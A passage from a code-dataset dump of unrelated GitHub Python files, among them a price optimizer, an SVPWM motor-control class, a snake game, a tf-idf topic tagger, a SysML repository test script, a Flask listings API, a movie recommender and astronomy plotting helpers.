cdc(trans_prob)\n envv = cdc(env)\n if len(conv_rate) != 3: # SE SONO PASSATI GLI STIMATORI E NON QUELLI VERI\n for i in range(5):\n for j in range(4):\n if (conv_rate[i][j] > 1) or (np.isinf(conv_rate[i][j])):\n conv_rate[i][j] = 1\n\n if len(tran_prob) != 3: # SE SONO PASSATI GLI STIMATORI E NON QUELLI VERI\n for i in range(5):\n for j in range(5):\n if (tran_prob[i][j] > 1) or (np.isinf(tran_prob[i][j])):\n tran_prob[i][j] = 1\n\n if len(conv_rate) != 3: # if I am in the case with one class only\n conv_rate = [conv_rate for _ in range(3)]\n if len(tran_prob) != 3:\n tran_prob = [tran_prob for _ in range(3)]\n if len(alpha) != 3:\n alpha = [alpha for _ in range(3)]\n\n env = Hyperparameters(tran_prob, alpha, envv.pois_param, conv_rate, envv.global_margin, n_buy)\n\n tr_prob = (tran_prob[0]+tran_prob[1]+tran_prob[2])/3\n\n count = 0\n cc = 4**5\n prices = [-1*np.ones(5) for _ in range(cc)]\n profits = np.zeros(cc, dtype=int)\n\n sim_prices = np.zeros(5, dtype=int)\n\n for p1 in range(4):\n sim_prices[0] = p1\n for p2 in range(4):\n sim_prices[1] = p2\n for p3 in range(4):\n sim_prices[2] = p3\n for p4 in range(4):\n sim_prices[3] = p4\n for p5 in range(4):\n sim_prices[4] = p5\n profits[count] = profit_puller(sim_prices, cdc(env), n_users_pt, tr_prob)\n prices[count] = cdc(sim_prices)\n\n count += 1\n sys.stdout.write('\\r' + print_message + str(\", pulling prices: \") + f'{count * 100 / cc} %')\n\n profits = np.array(profits, dtype=float)\n best = np.argmax(profits)\n return prices[best]\n","repo_name":"carloghiglione/HOLA_project","sub_path":"utils/old_structures&data/Price_puller.py","file_name":"Price_puller.py","file_ext":"py","file_size_in_byte":4760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43730369068","text":"from math import sqrt, pi, atan2\n\n\nclass SVPWM:\n Vi= [\n [0, 0],\n [-1.0/3.0, -sqrt(3) / 3.0],\n [-1.0/3.0, sqrt(3) / 3.0],\n [-2.0 / 3.0, 0.0],\n [2.0 / 3.0, 0.0],\n [1.0 / 3.0, -sqrt(3) / 3.0],\n [1.0 / 3.0, sqrt(3) / 3.0],\n [0, 0]\n ]\n swt = [[0, 0, 0],\n [0, 0, 1],\n [0, 1, 0],\n [0, 1, 1],\n [1, 0, 0],\n [1, 0, 1],\n [1, 1, 0],\n [1, 1, 1]]\n def __init__(self, vdc, tupdate):\n self.Vdc = vdc\n self.T_update = tupdate\n\n def getDC(self, Vref):\n 
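# Added note (grounded in the code below): reject references outside the linear modulation range,\n        # locate the 60-degree sector from the vector angle, solve the 2x2 system A*T = T_update*Vref\n        # for the two active dwell times, then spread the leftover time across the zero vectors.\n        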
assert(sqrt(Vref[0]**2 + Vref[1]**2) <= self.Vdc * sqrt(3)/3)\n\n theta = atan2(Vref[1], Vref[0]) * 180.0 / pi\n Vl = []\n Vr = []\n swl = []\n swr = []\n\n if theta >=0 and theta <=60:\n s = 1\n Vl = SVPWM.Vi[6].copy()\n Vr = SVPWM.Vi[4].copy()\n swl =SVPWM.swt[6].copy()\n swr = SVPWM.swt[4].copy()\n elif theta >=60 and theta <=120:\n s = 2\n Vl = SVPWM.Vi[2].copy()\n Vr = SVPWM.Vi[6].copy()\n swl = SVPWM.swt[2].copy()\n swr = SVPWM.swt[6].copy()\n elif theta >=120 and theta <=180:\n s = 3\n Vl = SVPWM.Vi[3].copy()\n Vr = SVPWM.Vi[2].copy()\n swl = SVPWM.swt[3].copy()\n swr = SVPWM.swt[2].copy()\n elif theta >=-180 and theta <=-120:\n s = 4\n Vl = SVPWM.Vi[1].copy()\n Vr = SVPWM.Vi[3].copy()\n swl = SVPWM.swt[1].copy()\n swr = SVPWM.swt[3].copy()\n elif theta >=-120 and theta <=-60:\n s = 5\n Vl = SVPWM.Vi[5].copy()\n Vr = SVPWM.Vi[1].copy()\n swl = SVPWM.swt[5].copy()\n swr = SVPWM.swt[1].copy()\n else:\n s=6\n Vl = SVPWM.Vi[4].copy()\n Vr = SVPWM.Vi[5].copy()\n swl = SVPWM.swt[4].copy()\n swr = SVPWM.swt[5].copy()\n\n A = [\n [Vl[0]*self.Vdc, Vr[0]*self.Vdc],\n [Vl[1]*self.Vdc, Vr[1]*self.Vdc]\n ]\n\n detA = A[0][0]*A[1][1] - A[1][0]*A[0][1]\n invA = [\n [A[1][1] / detA, -A[0][1] / detA],\n [-A[1][0] / detA, A[0][0] / detA]\n ]\n b = [self.T_update * Vref[0], self.T_update * Vref[1]]\n\n T = [\n invA[0][0] * b[0] + invA[0][1] * b[1],\n invA[1][0] * b[0] + invA[1][1] * b[1]\n ]\n Toff = self.T_update - T[0] - T[1]\n\n dc = [\n 1/self.T_update *(swl[0] * T[0] + swr[0] * T[1] + Toff / 2.0),\n 1/self.T_update *(swl[1] * T[0] + swr[1] * T[1] + Toff / 2.0),\n 1/self.T_update *(swl[2] * T[0] + swr[2] * T[1] + Toff / 2.0),\n ]\n\n return dc\n","repo_name":"gadokrisztian/stm-svpwm","sub_path":"python/svpwm.py","file_name":"svpwm.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36292268853","text":"import pygame\nimport time\nimport random\n\n# Define colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n\n# Set the window size\nWINDOW_WIDTH = 500\nWINDOW_HEIGHT = 500\n\n# Set the block size\nBLOCK_SIZE = 10\n\n# Set the FPS\nFPS = 30\n\n# Initialize Pygame\npygame.init()\n\n# Set the font for the score\nFONT = pygame.font.SysFont(\"comicsansms\", 30)\n\n# Set the caption for the window\npygame.display.set_caption(\"Snake Game\")\n\n# Create the game window\ngame_window = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n\n# Set the clock\nclock = pygame.time.Clock()\n\ndef draw_snake(snake_block_size, snake_list):\n \"\"\"Draws the snake on the screen.\"\"\"\n for x in snake_list:\n pygame.draw.rect(game_window, GREEN, [x[0], x[1], snake_block_size, snake_block_size])\n\ndef display_score(score):\n \"\"\"Displays the player's score on the screen.\"\"\"\n text = FONT.render(\"Score: \" + str(score), True, WHITE)\n game_window.blit(text, [0, 0])\n\ndef game_loop():\n \"\"\"Main game loop.\"\"\"\n # Set the initial position of the snake\n x = WINDOW_WIDTH / 2\n y = WINDOW_HEIGHT / 2\n \n # Set the initial change in position\n x_change = 0\n y_change = 0\n\n # Set the initial snake length\n snake_list = []\n snake_length = 1\n\n # Set the initial food position\n food_x = round(random.randrange(0, WINDOW_WIDTH - BLOCK_SIZE) / 10.0) * 10.0\n food_y = round(random.randrange(0, WINDOW_HEIGHT - BLOCK_SIZE) / 10.0) * 10.0\n\n # Set the initial score\n score = 0\n\n # Set the game over flag\n game_over = False\n\n while not game_over:\n 
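# Added note (grounded in the loop body below): one frame per iteration — handle input,\n        # move the snake, detect collisions, redraw, and cap the loop rate at FPS.\n        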
for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                game_over = True\n\n            if event.type == pygame.KEYDOWN:\n                if event.key == pygame.K_LEFT:\n                    x_change = -BLOCK_SIZE\n                    y_change = 0\n                elif event.key == pygame.K_RIGHT:\n                    x_change = BLOCK_SIZE\n                    y_change = 0\n                elif event.key == pygame.K_UP:\n                    x_change = 0\n                    y_change = -BLOCK_SIZE\n                elif event.key == pygame.K_DOWN:\n                    x_change = 0\n                    y_change = BLOCK_SIZE\n\n        # Move the snake\n        x += x_change\n        y += y_change\n\n        # Check for collision with the window boundaries\n        if x >= WINDOW_WIDTH or x < 0 or y >= WINDOW_HEIGHT or y < 0:\n            game_over = True\n\n        # Create a new food block if the snake eats the old one\n        if x == food_x and y == food_y:\n            food_x = round(random.randrange(0, WINDOW_WIDTH - BLOCK_SIZE) / 10.0) * 10.0\n            food_y = round(random.randrange(0, WINDOW_HEIGHT - BLOCK_SIZE) / 10.0) * 10.0\n            snake_length += 1\n            score += 10\n        # Create the snake head\n        snake_head = []\n        snake_head.append(x)\n        snake_head.append(y)\n        snake_list.append(snake_head)\n\n        # Remove the old blocks in the snake\n        if len(snake_list) > snake_length:\n            del snake_list[0]\n\n        # Check for collision with the snake itself\n        for block in snake_list[:-1]:\n            if block == snake_head:\n                game_over = True\n\n        # Draw the background and the food block\n        game_window.fill(BLACK)\n        pygame.draw.rect(game_window, RED, [food_x, food_y, BLOCK_SIZE, BLOCK_SIZE])\n\n        # Draw the snake on the screen\n        draw_snake(BLOCK_SIZE, snake_list)\n\n        # Display the player's score on the screen\n        display_score(score)\n\n        # Update the game window\n        pygame.display.update()\n\n        # Set the FPS\n        clock.tick(FPS)\n\n    # Quit Pygame\n    pygame.quit()\n\n    # Quit the program\n    quit()\n\n# Call the game loop function\ngame_loop()","repo_name":"Ayberkr/snake","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3924523669","text":"from sklearn.externals import joblib\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom databaseUtils import *\nimport numpy as np\nfrom time import time\n\ndb = DataUtils()\n\ndef top1words(tfidf_fit_transform, features_names):\n    \"\"\"\n    Return the top tf-idf word per row; indices line up with the rows\n    :param tfidf_fit_transform: tf-idf matrix\n    :param features_names: feature words\n    :return: list\n    \"\"\"\n    top1wordsLst = []\n    for i in range(0, tfidf_fit_transform.shape[0]):\n        index = np.argmax(tfidf_fit_transform[i].toarray())\n        top1wordsLst.append(features_names[index])\n    return top1wordsLst\n\n\ndef topicWords_extract(institution_teacher):\n    \"\"\"\n    Extract the topic words from the topiclda table; each institution is treated as one corpus\n    :param institution_teacher: institution name\n    :return: list\n    \"\"\"\n    corpus = []\n    sql = \"\"\"select topicwords_institution from topiclda where institution_teacher = '%s'\"\"\" % institution_teacher\n    result = db.select_all(sql)\n    for index, tuple in enumerate(result):\n        corpus.append(tuple[0])\n    return corpus\n\ndef tfidf_words(corpus):\n    \"\"\"\n    Vectorize the topiclda corpus into a tf-idf matrix\n    :param corpus:\n    :return:\n    \"\"\"\n    tfidfVectorizer = TfidfVectorizer()\n    tfidf_fit = tfidfVectorizer.fit(corpus)\n    tfidf_fit_transform = tfidfVectorizer.fit_transform(corpus)\n    features_names = tfidf_fit.get_feature_names()\n    return tfidf_fit_transform, features_names\n\ndef topicTag_insert(top1wordsLst, institution_teacher):\n    \"\"\"\n    Insert the tags into the target columns\n    :param top1wordsLst: list of tags\n    :param institution_teacher: institution name\n    :return:\n    \"\"\"\n    sql_result_topic_paper = \"\"\"select id_paper, topic_paper from doclda where institution_teacher = '%s'\"\"\" % 
institution_teacher\n result_topic_paper = db.select_all(sql_result_topic_paper)\n\n conn = db.conn()\n cursor = conn.cursor()\n for index in range(0, len(top1wordsLst)):\n\n sql_topiclda = \"\"\"update topiclda set tag_topic = '%s' where institution_teacher = '%s' and topicid_institution = '%s' \"\"\"\\\n %(top1wordsLst[index], institution_teacher, index)\n cursor.execute(sql_topiclda)\n for id_paper, topic_paper in enumerate(result_topic_paper):\n id_paper = int(topic_paper[0])\n topic_paper = int(topic_paper[1])\n sql_doclda = \"\"\"update doclda set tag_topic = '%s' where id_paper = '%s' \"\"\" \\\n % (top1wordsLst[topic_paper], id_paper)\n cursor.execute(sql_doclda)\n conn.commit()\n cursor.close()\n conn.close()\n\ndef test():\n s1 = time()\n corpus = topicWords_extract('哲学系宗教学系')\n s2 = time()\n print('time2-1 = ', s2 - s1)\n tfidf_fit_transform, features_names = tfidf_words(corpus)\n s3 = time()\n print('time3-2 = ', s3 - s2)\n top1wordsLst = top1words(tfidf_fit_transform, features_names)\n s4 = time()\n print('time4-3 = ', s4 - s3)\n topicTag_insert(top1wordsLst, '哲学系宗教学系')\n s5 = time()\n print('time5-4 = ', s5 - s4)\n\ndef main():\n institutionLst = joblib.load('institutionDoclda.pkl')\n for institution_teacher in institutionLst:\n start = time()\n corpus = topicWords_extract(institution_teacher)\n tfidf_fit_transform, features_names = tfidf_words(corpus)\n top1wordsLst = top1words(tfidf_fit_transform, features_names)\n topicTag_insert(top1wordsLst, institution_teacher)\n print('%s', institution_teacher, ' time ->', time() - start)\nif __name__ == '__main__':\n start = time()\n main()\n # test()\n print('time used -> ', time() -start)\n pass\n","repo_name":"ischenrui/eds","sub_path":"algorithm/lda&w2c/tagTopic.py","file_name":"tagTopic.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12551999343","text":"import sys\nimport os\nimport platform\nimport requests \nimport json\n \ndef DumpJupyterNotebook(cWorkingFolderAndOutputFile, cWorkingFolderAndInputFile, cSysMLString):\n cNotebookFile = cWorkingFolderAndOutputFile\n FID1=open(cWorkingFolderAndInputFile,'r');\n FID2=open(cNotebookFile,'w');\n for tline in FID1:\n num = tline.find('\"\"')\n if num > -1:\n cCommaBlankAndQuotationMark=',' + '\\r\\n' + ' \"'\n cCodedSysML=' \"' + cSysMLString.replace('\\r\\n','\\\\n\"' + cCommaBlankAndQuotationMark) \n #Remove final comma, blank and quotation mark \n cCodedSysML = cCodedSysML[:(len(cCodedSysML)-len(cCommaBlankAndQuotationMark))]\n FID2.write(cCodedSysML )\n else:\n FID2.write(tline)\n FID1.close()\n FID2.close()\n return cNotebookFile \n\n\n\ncServerName=\"http://localhost:9000\"\n\nprint(cServerName)\n\nprint('Complexity;NumFlowsInput;NumFlowsRead;Len')\n\n\nfor iComplexity in range(2):\n iNumActivities = 3\n while iNumActivities < 10:\n iNumActivities = iNumActivities + 1\n for iNumExperiment in range(10):\n SysMLstring =''\n\n clActivities = []\n clFlows = []\n clItems = []\n if iComplexity > 0:\n for iCount in (range(iNumActivities-1)):\n cItem = 'item' + str(iCount)\n clItems.append(cItem) \n SysMLstring = SysMLstring + 'item def ' + cItem + ';\\r\\n'\n \n SysMLstring = SysMLstring + 'package UseCaseActivities{'\n for iCount in (range(iNumActivities)):\n clActivities.append('Act' + str(iCount))\n clFlows.append('flow' + str(iCount))\n for iCount in (range(iNumActivities)):\n cAct = clActivities[iCount]\n cFlow = clFlows[iCount]\n SysMLstring = SysMLstring + '\\r\\n action 
def ' + cAct + '{'\n if iCount > 0:\n SysMLstring = SysMLstring + '\\r\\n in ' + clFlows[iCount-1] + ';'\n if iCount < len(clFlows)-1:\n SysMLstring = SysMLstring + '\\r\\n out ' + clFlows[iCount] + ';'\n SysMLstring = SysMLstring + '\\r\\n }'\n SysMLstring = SysMLstring + '\\r\\n action def ' + 'OverallUseCase' + ' {'\n for iCount in (range(iNumActivities)):\n cAct = clActivities[iCount]\n SysMLstring = SysMLstring + '\\r\\n action ' + cAct.lower() + ':' +cAct + ';'\n \n for iCount in (range(iNumActivities-1)):\n if iComplexity == 0:\n SysMLstring = SysMLstring + '\\r\\n flow from ' + clActivities[iCount].lower() + '.' + clFlows[iCount] + ' to ' + clActivities[iCount+1].lower() + '.' + clFlows[iCount] + ';'\n else:\n SysMLstring = SysMLstring + '\\r\\n flow of ' + clItems[iCount] + ' from ' + clActivities[iCount].lower() + '.' + clFlows[iCount] + ' to ' + clActivities[iCount+1].lower() + '.' + clFlows[iCount] + ';'\n \n SysMLstring = SysMLstring + '\\r\\n }'\n SysMLstring = SysMLstring + '\\r\\n}'\n \n SysMLstring = SysMLstring + '\\r\\n'\n\n \n #print(SysMLstring)\n \n\n cWorkingFolder=''\n cNotebookFile = cWorkingFolder + 'temp_fas_input_writer.ipynb' \n FID =open(cNotebookFile ,'w');\n FID.write('{\\n \"cells\": [\\n {\\n \"cell_type\": \"markdown\",\\n \"id\": \"237f75ac\",\\n \"metadata\": {},\\n \"source\": [\\n \"FAS for SysMLv2: FAS Input to Repository Writer\\\\n\",\\n \"==\"\\n ]\\n },\\n {\\n \"cell_type\": \"code\",\\n \"execution_count\": null,\\n \"id\": \"f4fe084d\",\\n \"metadata\": {},\\n \"outputs\": [],\\n \"source\": [\\n \"\"\\n ]\\n },\\n {\\n \"cell_type\": \"code\",\\n \"execution_count\": null,\\n \"id\": \"7e04e6fc\",\\n \"metadata\": {},\\n \"outputs\": [],\\n \"source\": [\\n \"%publish UseCaseActivities\"\\n ]\\n }\\n ],\\n \"metadata\": {\\n \"kernelspec\": {\\n \"display_name\": \"SysML\",\\n \"language\": \"sysml\",\\n \"name\": \"sysml\"\\n },\\n \"language_info\": {\\n \"codemirror_mode\": \"sysml\",\\n \"file_extension\": \".sysml\",\\n \"mimetype\": \"text/x-sysml\",\\n \"name\": \"SysML\",\\n \"pygments_lexer\": \"java\",\\n \"version\": \"1.0.0\"\\n }\\n },\\n \"nbformat\": 4,\\n \"nbformat_minor\": 5\\n}\\n')\n FID.close()\n\n cOutputFile = cWorkingFolder + 'temp_output.ipynb'\n cResultFile = cWorkingFolder + 'temp_result.ipynb'\n\n DumpJupyterNotebook(cOutputFile, cNotebookFile, SysMLstring)\n\n\n\n if platform.system()!='Windows':\n cSilencer='2>/dev/null'\n os.system('jupyter nbconvert --to notebook --execute ' + cOutputFile + ' --stdout >' + cResultFile + ' ' + cSilencer)\n else:\n cSilencer='>nul 2>&1';\n os.system('jupyter nbconvert --to notebook --execute ' + cOutputFile + ' --output=' + cResultFile + ' ' + cSilencer)\n\n status = ''\n FID1=open(cResultFile ,'r');\n bStdout = False\n bData = False\n bResultExpected = False\n for tline in FID1:\n #print(tline)\n if bResultExpected:\n status = 'STATUS: ' + tline.replace('\\\\n','').replace('\\\\r','').strip()\n break\n if tline.find('\"name\": \"stdout\",')>-1:\n bStdout = True\n if tline.find('\"data\": {')>-1 and bStdout:\n bData = True\n if tline.find('\"text/plain\": [')>-1 and bData:\n bResultExpected = True\n FID1.close()\n #print(status)\n\n targetProjectID = ''\n if status.find('Saved to Project') < 0:\n print('Error in commit to temporary project')\n else:\n posOpeningParenthesis = status.find('(')\n posClosingParenthesis = status.find(')')\n targetProjectID = status[(posOpeningParenthesis+1):posClosingParenthesis]\n\n\n\n\n bSuccess = True\n if len(targetProjectID) > 0:\n cErrorMessage 
= ''\n                cProjectID=targetProjectID\n                \n                #print('Reading Use Case Activities and Functional Groups from project ' + cProjectID + ' on server ' + cServerName + ' ...')\n                \n                try:\n                    response = requests.get(cServerName + \"/projects/\" + cProjectID)\n                except requests.exceptions.ConnectionError:\n                    bSuccess = False\n                    cErrorMessage = 'Error: Could not connect to server'\n                    print(cErrorMessage)\n\n                \n                if bSuccess and str(response)!='<Response [200]>':\n                    bSuccess = False\n                    cErrorMessage = 'Error: Could not find project on stated host'\n                    print('Error: Could not find project on stated host')\n\n                \n                if bSuccess:\n                    data = response.json()\n                    oDefaultBranch = data.get('defaultBranch')\n                    \n                    if str(type(oDefaultBranch)) == \"<class 'NoneType'>\":\n                        bSuccess = False\n                        cErrorMessage = 'Error: No default branch.'\n                        print (cErrorMessage)\n                    else:\n                        sDefaultBranchId=oDefaultBranch.get('@id')\n                \n                if bSuccess:\n                    response = requests.get(cServerName + \"/projects/\" + cProjectID + \"/branches/\" + sDefaultBranchId)\n                    data = response.json()\n                    oHeadCommit = data.get('head')\n                    if str(type(oHeadCommit)) == \"<class 'NoneType'>\":\n                        bSuccess = False\n                        cErrorMessage = 'Error: No commit found.'\n                        print (cErrorMessage)\n                    else:\n                        sHeadCommit = oHeadCommit.get('@id')\n\n\n                if bSuccess:\n                    response = requests.get(cServerName + \"/projects/\" + cProjectID + \"/commits/\"+sHeadCommit+\"/elements\")\n                    data = response.json()\n                    \n\n                    iCounter = 0\n                    for response in data:\n\n                        if response.get(\"@type\") == 'FlowConnectionUsage':\n                            iCounter = iCounter + 1\n                    \n                    \n                    print(str(iComplexity)+';'+str(iNumActivities-1)+';'+str(iCounter)+';'+str(len(str(data)))) \n\n\n\n\n\n\n\n","repo_name":"GfSE/fas4sysmlv2","sub_path":"src/auxiliary/test_symlv2_repository_read_write.py","file_name":"test_symlv2_repository_read_write.py","file_ext":"py","file_size_in_byte":8751,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"69801211130","text":"from flask import Flask, jsonify, render_template, request\nfrom flask_mongoengine import MongoEngine, MongoEngineSessionInterface, DoesNotExist\nfrom flask_debugtoolbar import DebugToolbarExtension\n\napp = Flask(__name__)\napp.config['MONGODB_SETTINGS'] = {\n    'db': 'house-hunt',\n}\napp.config['DEBUG_TB_PANELS'] = {\n    \"flask_debugtoolbar.panels.versions.VersionDebugPanel\",\n    \"flask_debugtoolbar.panels.timer.TimerDebugPanel\",\n    \"flask_debugtoolbar.panels.headers.HeaderDebugPanel\",\n    \"flask_debugtoolbar.panels.request_vars.RequestVarsDebugPanel\",\n    \"flask_debugtoolbar.panels.template.TemplateDebugPanel\",\n    \"flask_debugtoolbar.panels.logger.LoggingPanel\",\n    \"flask_mongoengine.panels.MongoDebugPanel\",\n}\n\ndb = MongoEngine(app)\napp.session_interface = MongoEngineSessionInterface(db)\ntoolbar = DebugToolbarExtension(app)\n\nclass ForSale(db.Document):\n    baths = db.FloatField()\n    beds = db.IntField()\n    city = db.StringField()\n    created = db.DateField()\n    garage = db.FloatField()\n    href = db.StringField()\n    last_update_date = db.DateField()\n    lat = db.LongField()\n    line = db.StringField()\n    list_date = db.DateField()\n    listing_id = db.StringField()\n    list_price = db.LongField()\n    lon = db.LongField()\n    name = db.StringField()\n    permalink = db.StringField()\n    postal_code = db.StringField()\n    property_id = db.StringField()\n    sold_price = db.LongField()\n    sqft = db.IntField()\n    state_code = db.StringField()\n    status = db.StringField()\n    stories = db.IntField()\n    sub_type = db.StringField()\n    type = db.StringField()\n    year_built = db.IntField()\n\nclass Coding(db.Document):\n    listing_id = db.StringField()\n    value 
= db.StringField()\n\n@app.route('/', methods=['GET'])\ndef list():\n return render_template('list.html')\n\n@app.route('/api/v1.0/listings/', methods=['GET'])\ndef listings():\n listings = ForSale.objects().all()\n return jsonify({\n \"status\": 200,\n \"data\": listings,\n \"errors\": [],\n }), 200\n\n@app.route('/api/v1.0/codings/', methods=['GET'])\ndef codings():\n codings = Coding.objects().all()\n return jsonify({\n \"status\": 200,\n \"data\": codings,\n \"errors\": [],\n }), 200\n\n@app.route('/api/v1.0/codings/', methods=['POST'])\ndef coding_create(listing_id):\n content = request.get_json(silent=True)\n value = content['value']\n\n try:\n existing = Coding.objects.get(listing_id=listing_id)\n return jsonify({\n \"status\": 500,\n \"data\": None,\n \"errors\": [\"Coding already exists for listing\"],\n }), 500\n except DoesNotExist:\n pass\n\n coding = Coding(listing_id=listing_id, value=value)\n coding.save()\n\n return jsonify({\n \"status\": 200,\n \"data\": {\n \"listing_id\": listing_id,\n \"value\": value,\n },\n \"errors\": [],\n }), 200\n\n@app.route('/api/v1.0/codings/', methods=['GET'])\ndef coding_read(listing_id):\n try:\n coding = Coding.objects.get(listing_id=listing_id)\n return jsonify({\n \"status\": 200,\n \"data\": coding,\n \"errors\": [],\n }), 200\n except DoesNotExist:\n return jsonify({\n \"status\": 404,\n \"data\": None,\n \"errors\": [\"Coding not found for listing\"],\n }), 404\n\n@app.route('/api/v1.0/codings/', methods=['PUT'])\ndef coding_update(listing_id):\n content = request.get_json(silent=True)\n value = content['value']\n\n try:\n coding = Coding.objects.get(listing_id=listing_id)\n coding.update(\n set__value = value,\n )\n\n return jsonify({\n \"status\": 200,\n \"data\": coding,\n \"errors\": [],\n }), 200\n\n except DoesNotExist:\n return jsonify({\n \"status\": 404,\n \"data\": None,\n \"errors\": [\"Coding not found for listing\"],\n }), 404\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","repo_name":"aaronogan/house-hunt","sub_path":"viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9470838304","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n# tmdb_5000_movies.csv\n\n\n# In[3]:\n\n\nimport pandas as pd\nimport numpy as np\n\n\n# In[4]:\n\n\ndf = pd.read_csv(\"tmdb_5000_movies.csv\")\n\n\n# In[5]:\n\n\ndf.shape\n\n\n# In[6]:\n\n\ndf.head()\n\n\n# In[7]:\n\n\ndf.columns\n\n\n# In[22]:\n\n\nfeatures = ['keywords','production_companies','genres']\nfor feature in features:\n df[feature] = df[feature].fillna('')\n\n\n# In[23]:\n\n\ndef combine_feature(row):\n try:\n \n return row['keywords'] + \" \"+ row['production_companies'] + \" \"+ row['genres'] \n except:\n print(row)\n\ndf['combined_features']=df.apply(combine_feature, axis =1)\n\n\n# In[24]:\n\n\ndf.iloc[0]['combined_features']\n\n\n# In[26]:\n\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n\n# In[27]:\n\n\ncv = CountVectorizer()\ncount_matrix = cv.fit_transform(df['combined_features'])\ncosine_model = cosine_similarity(count_matrix)\n\n\n# In[28]:\n\n\ncosine_model_df = pd.DataFrame(cosine_model)\ncosine_model_df.head()\n\n\n# In[29]:\n\n\ncosine_model_df = pd.DataFrame(cosine_model, index = df.title, columns = df.title)\ncosine_model_df.head()\n\n\n# In[32]:\n\n\ndef make_recommendations(movie_user_likes):\n return 
cosine_model_df[movie_user_likes].sort_values(ascending=False)[:20]\n\nmake_recommendations('Bang')\n\n\n# In[33]:\n\n\nmake_recommendations('Spider-Man 3')\n\n\n# In[34]:\n\n\nmake_recommendations('Men in Black 3')\n\n\n# In[35]:\n\n\nmake_recommendations('Titanic')\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"aman-source/Movie-Recommnder-System-ML","sub_path":"Untitled42.py","file_name":"Untitled42.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22521381367","text":"#!/usr/bin/env python\nfrom typing import List\nfrom collections import defaultdict\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n def verticalTraversal(self, root: TreeNode) -> List[List[int]]:\n info = defaultdict(list)\n\n def dfs(node, x, y):\n if node is None: return\n info[y].append((node.val, x, y))\n dfs(node.left, x + 1, y - 1)\n dfs(node.right, x + 1, y + 1)\n\n dfs(root, 0, 0)\n res = []\n for k in sorted(info):\n nodes = info[k]\n res.append([t[0] for t in sorted(nodes, key=lambda x:(x[1], x[0]))])\n return res","repo_name":"ftakanashi/JobProjects","sub_path":"LeetCode/987.二叉树的垂序遍历/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"43787988820","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cartopy\nimport cartopy.crs as ccrs\n\n\ndef plot_mollweide(ra_dec_coords, degrees=False):\n fig = plt.figure(figsize=(10, 5))\n ax = fig.add_subplot(111, projection=\"mollweide\", axisbg='LightCyan')\n ax.grid(True)\n for coords in ra_dec_coords:\n fov = np.array(coords)\n ra = fov[:, 0]\n dec = fov[:, 1]\n if degrees:\n ra = np.deg2rad(ra)\n dec = np.deg2rad(dec)\n ax.plot(ra, dec, '.')\n\n\ndef plot_az_alt_cartesian(all_altaz_coords):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.grid(True)\n ax.set_ylabel('Alt (deg)')\n ax.set_xlabel('Az (deg)')\n for coords in all_altaz_coords[:]:\n alts = []\n azs = []\n for coord in coords:\n alts.append(coord.alt.value)\n azs.append(coord.az.value)\n ax.plot(azs, alts, '.')\n ax.plot()\n ax.set_ylim(15, 70)\n\n\ndef plot_orthographic_projection(all_altaz_coords, central_longitude, central_latitude, az_offset):\n plt.figure(figsize=(9, 9))\n ax = plt.axes(projection=ccrs.Orthographic(central_longitude, central_latitude))\n\n ax.set_global()\n ax.gridlines()\n\n colors = 'bgrcmyk'\n\n ax.plot(range(-180, 180, 1), [65] * len(range(-180, 180, 1)), color='black', linewidth=1, marker='.',\n transform=ccrs.Geodetic())\n # 25 degrees off zenith\n\n for i, corners in enumerate(all_altaz_coords):\n lats = []\n lons = []\n for corner in corners:\n lats.append(corner.alt.value)\n lons.append(corner.az.value - az_offset)\n\n ax.scatter(lons, lats,\n color=colors[i], marker='o', transform=ccrs.Geodetic())\n\n\ndef plot_gnomonic_projection(all_altaz_coords, az_offset):\n plt.figure(figsize=(9, 9))\n ax = plt.axes(projection=ccrs.Gnomonic(central_latitude=90))\n\n ax.set_global()\n ax.gridlines()\n\n colors = 'bgrcmyk'\n\n ax.plot(range(-180, 180, 1), [65] * len(range(-180, 180, 1)), color='black', linewidth=1, marker='.',\n transform=ccrs.Geodetic())\n # 25 degrees off zenith\n\n for i, coords in enumerate(all_altaz_coords):\n lats = []\n lons = []\n for coord in coords:\n lats.append(coord.alt.value)\n 
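# Tiny self-contained illustration of the CountVectorizer + cosine_similarity
# pipeline used in the recommender above, on three toy 'combined feature'
# strings instead of the TMDB data.
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics.pairwise import cosine_similarity

docs = ['action space marvel', 'action space dc', 'romance drama']
count_matrix = CountVectorizer().fit_transform(docs)
sim = cosine_similarity(count_matrix)
print(sim.round(2))  # docs 0 and 1 share two tokens, so sim[0][1] > sim[0][2]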
